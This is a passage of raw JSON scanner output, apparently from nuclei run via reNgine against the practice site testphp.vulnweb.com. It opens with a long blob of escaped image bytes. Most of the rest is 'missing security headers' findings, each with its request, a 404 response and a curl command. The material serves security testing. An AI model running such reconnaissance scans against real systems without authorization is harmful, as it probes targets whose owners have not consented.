\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u0005\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd\\ufffdC\\u0002\\u0001\\ufffd \\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:52.416364601Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:53.102310242Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/login\",\"path\":\"/login\",\"matched-at\":\"http://testphp.vulnweb.com/login\",\"request\":\"GET /login HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:40 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page 